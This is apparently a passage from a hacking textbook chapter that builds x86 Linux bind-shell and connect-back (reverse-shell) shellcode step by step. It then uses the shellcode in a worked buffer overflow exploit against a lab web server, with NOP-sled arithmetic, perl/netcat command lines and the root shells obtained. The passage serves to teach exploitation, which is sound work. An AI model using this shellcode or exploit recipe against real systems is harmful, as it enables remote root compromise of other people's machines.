bind_port.s

BITS 32

; s = socket(2, 1, 0)
  push BYTE 0x66    ; socketcall is syscall #102 (0x66).
  pop eax
  cdq               ; Zero out edx for use as a null DWORD later.
  xor ebx, ebx      ; ebx is the type of socketcall.
  inc ebx           ; 1 = SYS_SOCKET = socket()
  push edx          ; Build arg array: { protocol = 0,
  push BYTE 0x1     ;   (in reverse)     SOCK_STREAM = 1,
  push BYTE 0x2     ;                    AF_INET = 2 }
  mov ecx, esp      ; ecx = ptr to argument array
  int 0x80          ; After syscall, eax has socket file descriptor.

  mov esi, eax      ; save socket FD in esi for later

; bind(s, [2, 31337, 0], 16)
  push BYTE 0x66    ; socketcall (syscall #102)
  pop eax
  inc ebx           ; ebx = 2 = SYS_BIND = bind()
  push edx          ; Build sockaddr struct:  INADDR_ANY = 0
  push WORD 0x697a  ;   (in reverse order)    PORT = 31337
  push WORD bx      ;                         AF_INET = 2
  mov ecx, esp      ; ecx = server struct pointer
  push BYTE 16      ; argv: { sizeof(server struct) = 16,
  push ecx          ;         server struct pointer,
  push esi          ;         socket file descriptor }
  mov ecx, esp      ; ecx = argument array
  int 0x80          ; eax = 0 on success

; listen(s, 4)
  mov BYTE al, 0x66 ; socketcall (syscall #102)
  inc ebx
  inc ebx           ; ebx = 4 = SYS_LISTEN = listen()
  push ebx          ; argv: { backlog = 4,
  push esi          ;         socket fd }
  mov ecx, esp      ; ecx = argument array
  int 0x80

; c = accept(s, 0, 0)
  mov BYTE al, 0x66 ; socketcall (syscall #102)
  inc ebx           ; ebx = 5 = SYS_ACCEPT = accept()
  push edx          ; argv: { socklen = 0,
  push edx          ;         sockaddr ptr = NULL,
  push esi          ;         socket fd }
  mov ecx, esp      ; ecx = argument array
  int 0x80          ; eax = connected socket FD

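When assembled and used in an exploit, this shellcode will bind to port 31337 and wait for an incoming connection, blocking at the accept call. When a connection is accepted, the new socket file descriptor is put into EAX at the end of this code. This won't really be useful until it's combined with the shell-spawning code described earlier. Fortunately, standard file descriptors make this fusion remarkably simple.

Duplicating Standard File Descriptors

Standard input, standard output, and standard error are the three standard file descriptors used by programs to perform standard I/O. Sockets, too, are just file descriptors that can be read from and written to. By simply swapping the standard input, output, and error of the spawned shell with the connected socket file descriptor, the shell will write output and errors to the socket and read its input from the bytes that the socket received. There is a system call specifically for duplicating file descriptors, called dup2. This is system call number 63.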

reader@hacking:~/booksrc $ grep dup2 /usr/include/asm-i386/unistd.h
#define __NR_dup2                63
reader@hacking:~/booksrc $ man 2 dup2
DUP(2)                     Linux Programmer's Manual                     DUP(2)

NAME
       dup, dup2 - duplicate a file descriptor

SYNOPSIS
       #include <unistd.h>
       int dup(int oldfd);
       int dup2(int oldfd, int newfd);

DESCRIPTION
       dup() and dup2() create a copy of the file descriptor oldfd.

       dup2() makes newfd be the copy of oldfd, closing newfd first if necessary.
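The C library wrapper for this system call can be exercised without touching a network. The sketch below points several descriptors at one open file in a single loop; `duplicate_onto` is a hypothetical helper written for this illustration, and the loop counts down the target list, a direction chosen here for illustration.

```c
#include <stddef.h>
#include <unistd.h>

/* Make every descriptor in targets[] refer to the same open file as oldfd.
 * Returns 0 on success, or -1 as soon as one dup2() call fails. */
int duplicate_onto(int oldfd, const int *targets, size_t count)
{
    for (size_t i = count; i-- > 0; ) {
        if (dup2(oldfd, targets[i]) < 0)
            return -1;
    }
    return 0;
}
```

Called with a connected socket and the targets 0, 1, and 2, this would leave standard input, output, and error all reading from and writing to that socket, which any program started afterward by execve() inherits.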

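The bind_port.s shellcode left off with the connected socket file descriptor in EAX. The following instructions are added in the file bind_shell_beta.s to duplicate this socket into the standard I/O file descriptors; then, the tiny_shell instructions are called to execute a shell in the current process. The spawned shell's standard input and output file descriptors will be the TCP connection, allowing remote shell access.

New instructions from bind_shell_beta.s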

; dup2(connected socket, {all three standard I/O file descriptors})
  mov ebx, eax      ; Move socket FD in ebx.
  push BYTE 0x3F    ; dup2  syscall #63
  pop eax
  xor ecx, ecx      ; ecx = 0 = standard input
  int 0x80          ; dup2(c, 0)
  mov BYTE al, 0x3F ; dup2  syscall #63
  inc ecx           ; ecx = 1 = standard output
  int 0x80          ; dup2(c, 1)
  mov BYTE al, 0x3F ; dup2  syscall #63
  inc ecx           ; ecx = 2 = standard error
  int 0x80          ; dup2(c, 2)

; execve(const char *filename, char *const argv [], char *const envp[])
  mov BYTE al, 11   ; execve  syscall #11
  push edx          ; push some nulls for string termination.
  push 0x68732f2f   ; push "//sh" to the stack.
  push 0x6e69622f   ; push "/bin" to the stack.
  mov ebx, esp      ; Put the address of "/bin//sh" into ebx via esp.
  push edx          ; push 32-bit null terminator to stack.
  mov edx, esp      ; This is an empty array for envp.
  push ebx          ; push string addr to stack above null terminator.
  mov ecx, esp      ; This is the argv array with string ptr.
  int 0x80          ; execve("/bin//sh", ["/bin//sh", NULL], [NULL])

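When this shellcode is assembled and used in an exploit, it will bind to port 31337 and wait for an incoming connection. In the output below, grep is used to quickly check for null bytes. At the end, the process hangs waiting for a connection.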

reader@hacking:~/booksrc $ nasm bind_shell_beta.s
reader@hacking:~/booksrc $ hexdump -C bind_shell_beta | grep --color=auto 00
00000000  6a 66 58 99 31 db 43 52  6a 01 6a 02 89 e1 cd 80  |jfX.1.CRj.j.....|
00000010  89 c6 6a 66 58 43 52 66  68 7a 69 66 53 89 e1 6a  |..jfXCRfhzifS..j|
00000020  10 51 56 89 e1 cd 80 b0  66 43 43 53 56 89 e1 cd  |.QV.....fCCSV...|
00000030  80 b0 66 43 52 52 56 89  e1 cd 80 89 c3 6a 3f 58  |..fCRRV......j?X|
00000040  31 c9 cd 80 b0 3f 41 cd  80 b0 3f 41 cd 80 b0 0b  |1....?A...?A....|
00000050  52 68 2f 2f 73 68 68 2f  62 69 6e 89 e3 52 89 e2  |Rh//shh/bin..R..|
00000060  53 89 e1 cd 80                                    |S....|
00000065
reader@hacking:~/booksrc $ export SHELLCODE=$(cat bind_shell_beta)
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./notesearch
SHELLCODE will be at 0xbffff97f
reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\x7f\xf9\xff\xbf"x40')
[DEBUG] found a 33 byte note for user id 999
-------[ end of note data ]-------

From another terminal window, the program netstat is used to find the listening port. Then, netcat is used to connect to the root shell on that port.

reader@hacking:~/booksrc $ sudo netstat -lp | grep 31337
tcp        0      0   *:31337          *:*            LISTEN     25604/notesearch
reader@hacking:~/booksrc $ nc -vv 127.0.0.1 31337
localhost [127.0.0.1] 31337 (?) open
whoami
root

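Branching Control Structures

The control structures of the C programming language, such as for loops and if-then-else blocks, are made up of conditional branches and loops in the machine language. With control structures, the repeated calls to dup2 could be shrunk down to a single call in a loop. The first C program written in previous chapters used a for loop to greet the world 10 times. Disassembling the main function will show us how the compiler implemented the for loop using assembly instructions. The loop instructions (the mov, cmp, jle, and jmp at main+16 through main+29, and the lea, inc, and jmp at main+43 through main+48) come after the function prologue instructions save stack memory for the local variable i. This variable is referenced in relation to the EBP register as [ebp-4].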

reader@hacking:~/booksrc $ gcc firstprog.c
reader@hacking:~/booksrc $ gdb -q ./a.out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) disass main
Dump of assembler code for function main:
0x08048374 <main+0>:    push   ebp
0x08048375 <main+1>:    mov    ebp,esp
0x08048377 <main+3>:    sub    esp,0x8
0x0804837a <main+6>:    and    esp,0xfffffff0
0x0804837d <main+9>:    mov    eax,0x0
0x08048382 <main+14>:   sub    esp,eax
0x08048384 <main+16>:   mov    DWORD PTR [ebp-4],0x0
0x0804838b <main+23>:   cmp    DWORD PTR [ebp-4],0x9
0x0804838f <main+27>:   jle    0x8048393 <main+31>
0x08048391 <main+29>:   jmp    0x80483a6 <main+50>
0x08048393 <main+31>:   mov    DWORD PTR [esp],0x8048484
0x0804839a <main+38>:   call   0x80482a0 <printf@plt>
0x0804839f <main+43>:   lea    eax,[ebp-4]
0x080483a2 <main+46>:   inc    DWORD PTR [eax]
0x080483a4 <main+48>:   jmp    0x804838b <main+23>
0x080483a6 <main+50>:   leave
0x080483a7 <main+51>:   ret
End of assembler dump.
(gdb)

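The loop contains two new instructions: cmp (compare) and jle (jump if less than or equal to), the latter belonging to the family of conditional jump instructions. The cmp instruction will compare its two operands, setting flags based on the result. Then, a conditional jump instruction will jump based on the flags. In the code above, if the value at [ebp-4] is less than or equal to 9, execution will jump to 0x8048393, past the next jmp instruction. Otherwise, the next jmp instruction brings execution to the end of the function at 0x080483a6, exiting the loop. The body of the loop makes the call to printf(), increments the counter variable at [ebp-4], and finally jumps back to the compare instruction to continue the loop. Using conditional jump instructions, complex programming control structures such as loops can be created in assembly. More conditional jump instructions are shown below.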

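Instruction	Description
`cmp <dest>, <source>`	Compares the destination operand with the source operand, setting flags for use with a conditional jump instruction.
`je <target>`	Jumps to target if the compared values are equal.
`jne <target>`	Jumps if not equal.
`jl <target>`	Jumps if less than.
`jle <target>`	Jumps if less than or equal to.
`jnl <target>`	Jumps if not less than.
`jnle <target>`	Jumps if not less than or equal to.
`jg jge`	Jumps if greater than, or greater than or equal to.
`jng jnge`	Jumps if not greater than, or not greater than or equal to.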

These instructions can be used to shrink the dup2 portion of the shellcode down to the following:

; dup2(connected socket, {all three standard I/O file descriptors})
  mov ebx, eax      ; Move socket FD in ebx.
  xor eax, eax      ; Zero eax.
  xor ecx, ecx      ; ecx = 0 = standard input
dup_loop:
  mov BYTE al, 0x3F ; dup2  syscall #63
  int 0x80          ; dup2(c, 0)
  inc ecx
  cmp BYTE cl, 2    ; Compare ecx with 2.
  jle dup_loop      ; If ecx <= 2, jump to dup_loop.

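This loop iterates ECX from 0 to 2, making a call to dup2 each time. With a more complete understanding of the flags used by the cmp instruction, this loop can be shrunk even further. The status flags set by the cmp instruction are also set by most other instructions, describing the attributes of the instruction's result. These flags are the carry flag (CF), parity flag (PF), adjust flag (AF), overflow flag (OF), zero flag (ZF), and sign flag (SF). The last two flags are the most useful and the easiest to understand. The zero flag is set to true if the result is zero, otherwise it is false. The sign flag is simply the most significant bit of the result, which is true if the result is negative and false otherwise. This means that, after any instruction with a negative result, the sign flag becomes true and the zero flag becomes false.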

Abbreviation	Name	Description
ZF	zero flag	True if the result is zero.
SF	sign flag	True if the result is negative (equal to the most significant bit of the result).

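The cmp (compare) instruction is actually just a sub (subtract) instruction that throws away the result, only affecting the status flags. The jle (jump if less than or equal to) instruction is actually checking the zero and sign flags. If either of these flags is true, then the destination (first) operand is less than or equal to the source (second) operand. (Strictly, jle jumps when the zero flag is set or when the sign flag differs from the overflow flag; when the subtraction does not overflow, this reduces to checking the sign flag.) The other conditional jump instructions work in a similar way, and there are still more conditional jump instructions that directly check individual status flags: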

Instruction	Description
`jz <target>`	Jumps to target if the zero flag is set.
`jnz <target>`	Jumps if the zero flag is not set.
`js <target>`	Jumps if the sign flag is set.
`jns <target>`	Jumps if the sign flag is not set.

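With this knowledge, the cmp (compare) instruction can be removed entirely if the loop's order is reversed. Starting from 2 and counting down, the sign flag can be checked to loop until 0. The shortened loop is shown below; the changes are the push/pop pair that initializes ECX and the dec and jns instructions that end the loop.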

; dup2(connected socket, {all three standard I/O file descriptors})
  mov ebx, eax      ; Move socket FD in ebx.
  xor eax, eax      ; Zero eax.
  push BYTE 0x2     ; ecx starts at 2.
  pop ecx
dup_loop:
  mov BYTE al, 0x3F ; dup2  syscall #63
  int 0x80          ; dup2(c, 0)
  dec ecx           ; Count down to 0.
  jns dup_loop      ; If the sign flag is not set, ecx is not negative.
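The termination condition of this countdown can be traced in C. The sketch is a model, not the shellcode itself: `countdown_visits` is a hypothetical name, the sign flag is computed as bit 31 of the decremented counter, and the loop body only records which values of ECX a dup2 call would have seen.

```c
#include <stddef.h>
#include <stdint.h>

/* Record each value of ecx seen by the loop body, looping until the
 * decrement turns the sign flag on. Returns the number of iterations;
 * at most cap values are stored in visited. */
size_t countdown_visits(uint32_t start, uint32_t *visited, size_t cap)
{
    uint32_t ecx = start;
    size_t n = 0;
    unsigned sign_flag;

    do {
        if (n < cap)
            visited[n] = ecx;            /* loop body: dup2(c, ecx) */
        n++;
        ecx--;                           /* dec ecx */
        sign_flag = (ecx >> 31) & 1u;    /* SF = most significant bit of result */
    } while (!sign_flag);                /* jns dup_loop */

    return n;
}
```

Starting at 2, the body runs for 2, 1, and 0. The decrement from 0 wraps to 0xffffffff, which sets the sign flag and ends the loop after exactly three iterations.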

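The first two instructions before the loop can be shortened with the xchg (exchange) instruction. This instruction swaps the values between the source and destination operands: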

Instruction	Description
`xchg <dest>, <source>`	Exchanges the values between the two operands.

This single instruction can replace both of the following instructions, which take up four bytes:

	89 C3              mov ebx,eax
	31 C0              xor eax,eax

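The EAX register needs to be zeroed to clear only the upper three bytes of the register, and EBX already has these upper bytes cleared. So swapping the values between the EAX and EBX registers will kill two birds with one stone, reducing the size to the following single-byte instruction: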

	93                 xchg eax,ebx
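The reasoning can be checked with a two-register model in C. The struct and function names are hypothetical, and the starting values are assumptions taken from the surrounding code: EAX holds a small socket descriptor returned by accept, and EBX still holds 5 from the SYS_ACCEPT call.

```c
#include <stdint.h>

/* Just the two registers involved in the swap. */
struct regs {
    uint32_t eax;
    uint32_t ebx;
};

/* Model "xchg eax, ebx": the two registers trade values. */
struct regs xchg_eax_ebx(struct regs r)
{
    uint32_t tmp = r.eax;

    r.eax = r.ebx;
    r.ebx = tmp;
    return r;
}
```

After the swap EBX holds the descriptor that dup2 needs as its first argument, and EAX holds 5, whose upper three bytes are zero, so a following mov al, 0x3f leaves exactly 0x0000003f in EAX.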

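Since the xchg instruction is actually smaller than a mov instruction between two registers, it can be used to shrink shellcode in other places. Naturally, this only works in situations where the source operand's register doesn't matter. The following version of the bind port shellcode uses the exchange instruction to shave a few more bytes off its size.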

bind_shell.s

BITS 32

; s = socket(2, 1, 0)
  push BYTE 0x66    ; socketcall is syscall #102 (0x66).
  pop eax
  cdq               ; Zero out edx for use as a null DWORD later.
  xor ebx, ebx      ; Ebx is the type of socketcall.
  inc ebx           ; 1 = SYS_SOCKET = socket()
  push edx          ; Build arg array: { protocol = 0,
  push BYTE 0x1     ;   (in reverse)     SOCK_STREAM = 1,
  push BYTE 0x2     ;                    AF_INET = 2 }
  mov ecx, esp      ; ecx = ptr to argument array
  int 0x80          ; After syscall, eax has socket file descriptor.

  xchg esi, eax     ; Save socket FD in esi for later.

; bind(s, [2, 31337, 0], 16)
  push BYTE 0x66    ; socketcall (syscall #102)
  pop eax
  inc ebx           ; ebx = 2 = SYS_BIND = bind()
  push edx          ; Build sockaddr struct:  INADDR_ANY = 0
  push WORD 0x697a  ;   (in reverse order)    PORT = 31337
  push WORD bx      ;                         AF_INET = 2
  mov ecx, esp      ; ecx = server struct pointer
  push BYTE 16      ; argv: { sizeof(server struct) = 16,
  push ecx          ;         server struct pointer,
  push esi          ;         socket file descriptor }
  mov ecx, esp      ; ecx = argument array
  int 0x80          ; eax = 0 on success

; listen(s, 0)
  mov BYTE al, 0x66 ; socketcall (syscall #102)
  inc ebx
  inc ebx           ; ebx = 4 = SYS_LISTEN = listen()
  push ebx          ; argv: { backlog = 4,
  push esi          ;         socket fd }
  mov ecx, esp      ; ecx = argument array
  int 0x80

; c = accept(s, 0, 0)
  mov BYTE al, 0x66 ; socketcall (syscall #102)
  inc ebx           ; ebx = 5 = SYS_ACCEPT = accept()
  push edx          ; argv: { socklen = 0,
  push edx          ;         sockaddr ptr = NULL,
  push esi          ;         socket fd }
  mov ecx, esp      ; ecx = argument array
  int 0x80          ; eax = connected socket FD

; dup2(connected socket, {all three standard I/O file descriptors})
  xchg eax, ebx     ; Put socket FD in ebx and 0x00000005 in eax.
  push BYTE 0x2     ; ecx starts at 2.
  pop ecx
dup_loop:
  mov BYTE al, 0x3F ; dup2  syscall #63
  int 0x80          ; dup2(c, 0)
  dec ecx           ; count down to 0
  jns dup_loop      ; If the sign flag is not set, ecx is not negative.

; execve(const char *filename, char *const argv [], char *const envp[])
  mov BYTE al, 11   ; execve  syscall #11
  push edx          ; push some nulls for string termination.
  push 0x68732f2f   ; push "//sh" to the stack.
  push 0x6e69622f   ; push "/bin" to the stack.
  mov ebx, esp      ; Put the address of "/bin//sh" into ebx via esp.
  push edx          ; push 32-bit null terminator to stack.
  mov edx, esp      ; This is an empty array for envp.
  push ebx          ; push string addr to stack above null terminator.
  mov ecx, esp      ; This is the argv array with string ptr
  int 0x80          ; execve("/bin//sh", ["/bin//sh", NULL], [NULL])

This assembles to the same 92-byte bind_shell shellcode used in the previous chapter.

reader@hacking:~/booksrc $ nasm bind_shell.s 
reader@hacking:~/booksrc $ hexdump -C bind_shell
00000000  6a 66 58 99 31 db 43 52  6a 01 6a 02 89 e1 cd 80  |jfX.1.CRj.j.....|
00000010  96 6a 66 58 43 52 66 68  7a 69 66 53 89 e1 6a 10  |.jfXCRfhzifS..j.|
00000020  51 56 89 e1 cd 80 b0 66  43 43 53 56 89 e1 cd 80  |QV.....fCCSV....|
00000030  b0 66 43 52 52 56 89 e1  cd 80 93 6a 02 59 b0 3f  |.fCRRV.....j.Y.?|
00000040  cd 80 49 79 f9 b0 0b 52  68 2f 2f 73 68 68 2f 62  |..Iy...Rh//shh/b|
00000050  69 6e 89 e3 52 89 e2 53  89 e1 cd 80              |in..R..S....|
0000005c
reader@hacking:~/booksrc $ diff bind_shell portbinding_shellcode

Connect-Back Shellcode

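Port-binding shellcode is easily foiled by firewalls. Most firewalls block incoming connections, except on specific ports for known services. This limits the user's exposure and prevents port-binding shellcode from receiving a connection. Software firewalls are now so common that port-binding shellcode has little chance of actually working in the wild.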

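However, firewalls typically do not filter outbound connections, since that would hinder usability. From inside the firewall, a user should be able to access any web page or make any other outbound connection. This means that if the shellcode initiates the outbound connection, most firewalls will allow it.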

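Instead of waiting for a connection from an attacker, connect-back shellcode initiates a TCP connection back to the attacker's IP address. Opening a TCP connection only requires a call to socket() and a call to connect(). This is very similar to the bind-port shellcode, since the socket call is exactly the same and the connect() call takes the same type of arguments as bind(). The following connect-back shellcode was made from the bind-port shellcode with a few modifications.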


connectback_shell.s

BITS 32

; s = socket(2, 1, 0)
  push BYTE 0x66    ; socketcall is syscall #102 (0x66).
  pop eax
  cdq               ; Zero out edx for use as a null DWORD later.
  xor ebx, ebx      ; ebx is the type of socketcall.
  inc ebx           ; 1 = SYS_SOCKET = socket()
  push edx          ; Build arg array: { protocol = 0,
  push BYTE 0x1     ;   (in reverse)     SOCK_STREAM = 1,
  push BYTE 0x2     ;                    AF_INET = 2 }
  mov ecx, esp      ; ecx = ptr to argument array
  int 0x80          ; After syscall, eax has socket file descriptor.

  xchg esi, eax     ; Save socket FD in esi for later.

; connect(s, [2, 31337, <IP address>], 16)
  push BYTE 0x66    ; socketcall (syscall #102)
  pop eax
  inc ebx           ; ebx = 2 (needed for AF_INET)
  push DWORD 0x482aa8c0 ; Build sockaddr struct: IP address = 192.168.42.72
  push WORD 0x697a  ;   (in reverse order)    PORT = 31337
  push WORD bx      ;                         AF_INET = 2
  mov ecx, esp      ; ecx = server struct pointer
  push BYTE 16      ; argv: { sizeof(server struct) = 16,
  push ecx          ;         server struct pointer,
  push esi          ;         socket file descriptor }
  mov ecx, esp      ; ecx = argument array
  inc ebx           ; ebx = 3 = SYS_CONNECT = connect()
  int 0x80          ; eax = 0 on success

; dup2(connected socket, {all three standard I/O file descriptors})
  xchg esi, ebx     ; Put socket FD in ebx and 0x00000003 in esi.
  xchg ecx, esi     ; ecx = 3
  dec ecx           ; ecx starts at 2.
dup_loop:
  mov BYTE al, 0x3F ; dup2  syscall #63
  int 0x80          ; dup2(c, 0)
  dec ecx           ; Count down to 0.
  jns dup_loop      ; If the sign flag is not set, ecx is not negative.

; execve(const char *filename, char *const argv [], char *const envp[])
  mov BYTE al, 11   ; execve  syscall #11.
  push edx          ; push some nulls for string termination.
  push 0x68732f2f   ; push "//sh" to the stack.
  push 0x6e69622f   ; push "/bin" to the stack.
  mov ebx, esp      ; Put the address of "/bin//sh" into ebx via esp.
  push edx          ; push 32-bit null terminator to stack.
  mov edx, esp      ; This is an empty array for envp.
  push ebx          ; push string addr to stack above null terminator.
  mov ecx, esp      ; This is the argv array with string ptr.
  int 0x80          ; execve("/bin//sh", ["/bin//sh", NULL], [NULL])

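In the shellcode above, the connection IP address is set to 192.168.42.72, which should be the IP address of the attacking machine. This address is stored in the in_addr structure as 0x482aa8c0, which is the hexadecimal representation of 72, 42, 168, and 192. This is made clear when each number is displayed in hexadecimal: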

reader@hacking:~/booksrc $ gdb -q
(gdb) p /x 192
$1 = 0xc0
(gdb) p /x 168
$2 = 0xa8
(gdb) p /x 42
$3 = 0x2a
(gdb) p /x 72
$4 = 0x48
(gdb) p /x 31337
$5 = 0x7a69
(gdb)

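Since these values are stored in network byte order but the x86 architecture is little-endian, the stored DWORD seems to be reversed. This means the DWORD for 192.168.42.72 is 0x482aa8c0. The same applies to the two-byte WORD used for the destination port. gdb prints the port number 31337 as 0x7a69, and network byte order wants the bytes 7a 69 in memory in that order. Because x86 stores the low byte of a value first, the displayed bytes must be reversed, so the WORD for 31337 is 0x697a.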
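The byte reversal described above is easy to get wrong by hand, so here is a small C sketch that derives the push immediates from the dotted address and the port. The helper names (`ip_push_dword`, `port_push_word`, `store_le32`) are made up for this example and are not part of the book's source.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* DWORD immediate whose little-endian bytes in memory read a.b.c.d,
 * which is the network byte order layout of the IPv4 address. */
uint32_t ip_push_dword(uint8_t a, uint8_t b, uint8_t c, uint8_t d) {
    return (uint32_t)a | ((uint32_t)b << 8) | ((uint32_t)c << 16) | ((uint32_t)d << 24);
}

/* WORD immediate whose little-endian bytes in memory are the port in
 * network byte order: simply the port with its two bytes swapped. */
uint16_t port_push_word(uint16_t port) {
    return (uint16_t)((port >> 8) | (port << 8));
}

/* Store v the way x86 does: least significant byte at the lowest address. */
void store_le32(uint32_t v, uint8_t out[4]) {
    assert(out != NULL);
    for (int i = 0; i < 4; i++)
        out[i] = (uint8_t)(v >> (8 * i));
}
```

For example, `ip_push_dword(192, 168, 42, 72)` evaluates to 0x482aa8c0 and `port_push_word(31337)` to 0x697a, matching the constants used in connectback_shell.s.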

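The netcat program can also be used to listen for incoming connections with the -l command-line option. In the output below, it listens on port 31337 for the connect-back shellcode. The ifconfig command ensures the IP address of eth0 is 192.168.42.72 so the shellcode can connect back to it.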

reader@hacking:~/booksrc $ sudo ifconfig eth0 192.168.42.72 up
reader@hacking:~/booksrc $ ifconfig eth0
eth0      Link encap:Ethernet  HWaddr 00:01:6C:EB:1D:50
          inet addr:192.168.42.72  Bcast:192.168.42.255  Mask:255.255.255.0
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
          Interrupt:16

reader@hacking:~/booksrc $ nc -v -l -p 31337
listening on [any] 31337 ...

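Now, let's try to exploit the tinyweb server program using the connect-back shellcode. From working with this program before, we know that the request buffer is 500 bytes long and is located at 0xbffff5c0 in stack memory. We also know that the return address is found within 40 bytes of the end of the buffer.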

reader@hacking:~/booksrc $ nasm connectback_shell.s
reader@hacking:~/booksrc $ hexdump -C connectback_shell
00000000  6a 66 58 99 31 db 43 52  6a 01 6a 02 89 e1 cd 80  |jfX.1.CRj.j.....|
00000010  96 6a 66 58 43 68 c0 a8  2a 48 66 68 7a 69 66 53  |.jfXCh..*HfhzifS|
00000020  89 e1 6a 10 51 56 89 e1  43 cd 80 87 f3 87 ce 49  |..j.QV..C......I|
00000030  b0 3f cd 80 49 79 f9 b0  0b 52 68 2f 2f 73 68 68  |.?..Iy...Rh//shh|
00000040  2f 62 69 6e 89 e3 52 89  e2 53 89 e1 cd 80        |/bin..R..S....|
0000004e
reader@hacking:~/booksrc $ wc -c connectback_shell
78 connectback_shell
reader@hacking:~/booksrc $ echo $(( 544 - (4*16) - 78 ))
402
reader@hacking:~/booksrc $ gdb -q --batch -ex "p /x 0xbffff5c0 + 200"
$1 = 0xbffff688
reader@hacking:~/booksrc $

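Since the offset from the beginning of the buffer to the return address is 540 bytes, a total of 544 bytes must be written to overwrite the four-byte return address. The return address overwrite also needs to be properly aligned, since the return address uses multiple bytes. To ensure proper alignment, the sum of the NOP sled and shellcode bytes must be divisible by four. In addition, the shellcode itself must stay within the first 500 bytes of the overwrite. These are the bounds of the request buffer, and the memory afterward corresponds to other values on the stack that might be written to before the program's control flow is changed. Staying within these bounds avoids the risk of random overwrites to the shellcode, which inevitably lead to crashes.

Repeating the return address 16 times generates 64 bytes, which can be put at the end of the 544-byte exploit buffer and keeps the shellcode safely within the bounds of the buffer. The remaining bytes at the beginning of the exploit buffer will be the NOP sled. The calculations above show that a 402-byte NOP sled will properly align the 78-byte shellcode and place it safely within the bounds of the buffer: 402 + 78 = 480 bytes, which is divisible by four and less than 500. With 16 repetitions of the return address, the final 4 bytes of the exploit buffer line up exactly with the saved return address on the stack. Overwriting the return address with 0xbffff688 should return execution right to the middle of the NOP sled, while avoiding bytes near the beginning of the buffer, which might get mangled. These calculated values will be used in the following exploit, but first the connect-back shell needs somewhere to connect back to. In the output below, netcat is used to listen for incoming connections on port 31337.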
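The arithmetic in this discussion can be captured in one function. The following is a minimal sketch, assuming the layout [NOP sled][shellcode][repeated return address] described above; `nop_sled_length` and its parameter names are invented for illustration.

```c
#include <assert.h>
#include <stddef.h>

/* Returns the NOP sled length for a buffer laid out as
 *   [NOP sled][shellcode][return address x ret_repeats]
 * so that the last copy of the return address lands exactly on the saved
 * return address at ret_offset. Returns -1 if the pieces do not fit, or if
 * the sled plus shellcode would extend past the buf_len-byte request buffer. */
long nop_sled_length(size_t ret_offset, size_t shellcode_len,
                     size_t ret_repeats, size_t buf_len) {
    assert(ret_repeats > 0);
    size_t total = ret_offset + 4;   /* bytes needed to cover the saved address */
    size_t tail  = 4 * ret_repeats;  /* bytes used by the repeated address */
    if (shellcode_len + tail > total)
        return -1;
    size_t sled = total - tail - shellcode_len;
    if (sled + shellcode_len > buf_len)
        return -1;                   /* shellcode would leave the safe region */
    return (long)sled;
}
```

With an offset of 540, a 78-byte shellcode, 16 repetitions, and a 500-byte buffer, this yields 402, the same value the shell arithmetic produced. Because the sled is computed by subtracting from the end, the repeated addresses are always aligned with the saved return address.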

reader@hacking:~/booksrc $ nc -v -l -p 31337
listening on [any] 31337 ...

Now, in another terminal, the calculated exploit values can be used to exploit the tinyweb program remotely.

From Another Terminal Window

reader@hacking:~/booksrc $ (perl -e 'print "\x90"x402';
> cat connectback_shell;
> perl -e 'print "\x88\xf6\xff\xbf"x20 . "\r\n"') | nc -v 127.0.0.1 80
localhost [127.0.0.1] 80 (www) open

Back in the original terminal, the shellcode has connected back to the netcat process listening on port 31337. This provides root shell access remotely.

reader@hacking:~/booksrc $ nc -v -l -p 31337
listening on [any] 31337 ...
connect to [192.168.42.72] from hacking.local [192.168.42.72] 34391
whoami
root

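The network configuration for this example is slightly confusing because the attack is directed at 127.0.0.1 and the shellcode connects back to 192.168.42.72. Both of these IP addresses route to the same place, but 192.168.42.72 is easier to use in shellcode than 127.0.0.1. Since the loopback address contains two null bytes, the address must be built on the stack with multiple instructions. One way to do this is to write the two null bytes to the stack using a zeroed register. The file loopback_shell.s is a modified version of connectback_shell.s that uses the loopback address of 127.0.0.1. The differences are shown in the following output.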

reader@hacking:~/booksrc $ diff connectback_shell.s loopback_shell.s
21c21,22
<   push DWORD 0x482aa8c0 ; Build sockaddr struct: IP Address = 192.168.42.72
---
>   push DWORD 0x01BBBB7f ; Build sockaddr struct: IP Address = 127.0.0.1
>   mov WORD [esp+1], dx  ; overwrite the BBBB with 0000 in the previous push
reader@hacking:~/booksrc $

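After the value 0x01BBBB7f is pushed to the stack, the ESP register points to the beginning of this DWORD. Writing a two-byte WORD of null bytes at ESP+1 overwrites the middle two bytes, leaving the bytes 7f 00 00 01 in memory, which is 127.0.0.1 in network byte order.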
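The two-instruction trick can be replayed on a four-byte array standing in for the top of the stack. This is a sketch for checking the byte positions only; `build_loopback_addr` is a hypothetical name, and the array plays the role of the memory at ESP.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Simulate:
 *   push DWORD 0x01BBBB7f
 *   mov WORD [esp+1], dx      ; dx is zero (edx was cleared by cdq)
 * stack_top[0] corresponds to the byte at ESP after the push. */
void build_loopback_addr(uint8_t stack_top[4]) {
    assert(stack_top != NULL);
    const uint32_t pushed = 0x01BBBB7fu;
    const uint16_t dx = 0;
    /* x86 stores the least significant byte at the lowest address. */
    for (int i = 0; i < 4; i++)
        stack_top[i] = (uint8_t)(pushed >> (8 * i));
    /* The WORD write covers ESP+1 and ESP+2, the two placeholder bytes. */
    stack_top[1] = (uint8_t)(dx & 0xFF);
    stack_top[2] = (uint8_t)(dx >> 8);
}
```

After the call, the array holds 127, 0, 0, 1, and no null byte ever had to appear in the instruction stream.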

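This additional instruction increases the size of the shellcode by five bytes (from 78 to 83), which means the NOP sled also needs to be adjusted for the exploit buffer. These calculations are shown in the output below, and they result in a 397-byte NOP sled. This exploit using the loopback shellcode assumes that the tinyweb program is running and that a netcat process is listening for incoming connections on port 31337.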

reader@hacking:~/booksrc $ nasm loopback_shell.s
reader@hacking:~/booksrc $ hexdump -C loopback_shell | grep --color=auto 00
00000000  6a 66 58 99 31 db 43 52  6a 01 6a 02 89 e1 cd 80  |jfX.1.CRj.j.....|
00000010  96 6a 66 58 43 68 7f bb  bb 01 66 89 54 24 01 66  |.jfXCh....f.T$.f|
00000020  68 7a 69 66 53 89 e1 6a  10 51 56 89 e1 43 cd 80  |hzifS..j.QV..C..|
